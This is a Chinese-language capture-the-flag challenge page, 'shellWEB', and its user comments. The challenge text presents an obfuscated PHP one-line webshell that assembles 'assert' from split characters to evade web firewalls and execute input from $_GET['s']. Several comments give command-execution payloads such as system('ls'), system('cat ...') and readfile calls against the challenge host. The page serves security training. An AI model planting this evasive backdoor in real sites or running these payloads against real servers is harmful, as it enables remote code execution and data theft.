shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8723
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
西红柿dun牛腩 11天前

这道题目,需要一点基础知识,还需要一些脑洞,初学者不容易想到。很好的学习素材

回复 0

yiqie 13天前

flag{**********}

回复 0

icyskin 18天前

http://160.202.254.160:19320/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

ggsea 29天前

列出当前目录:?s=print_r(scandir('./')),看到flag.txt

回复 0

lawrencekz 2月前

flag{******}

回复 0

hwx 2月前

直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg

回复 1

b2026tf 2月前

本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');

回复 0

syhaisy 3月前

20702af5309ab1f70e0f7e8a81076a4e

回复 0

hualong 3月前

直接去搜索 http://171.80.2.169:12682/?s=readfile(%22flaga15808abee46a1d5.txt%22);

回复 1

dlccom 3月前

?s=readfile('/var/www/html/flaga15808abee46a1d5.txt'); 读出 flag

回复 0

WriteUp

image
harry

3 金币

评分(10)

解题动态

qn9301 攻破了该题 9小时前
wsx68696 攻破了该题 9小时前
atctf 攻破了该题 10小时前
lipingctf 攻破了该题 11小时前
cykai999 攻破了该题 14小时前
河马 攻破了该题 19小时前
jvfnvd.vl 攻破了该题 20小时前
xong_bai 攻破了该题 1天前
999哲111 攻破了该题 1天前
qianhuan 攻破了该题 1天前
15620346617 攻破了该题 2天前
3145145 攻破了该题 2天前
gc 攻破了该题 2天前
Warp 攻破了该题 2天前
bugku0521 攻破了该题 2天前
1606143712 攻破了该题 3天前
zrlht 攻破了该题 3天前
多米今天犯错了没 攻破了该题 3天前
kramin 攻破了该题 3天前
ciphercici 攻破了该题 3天前
问题反馈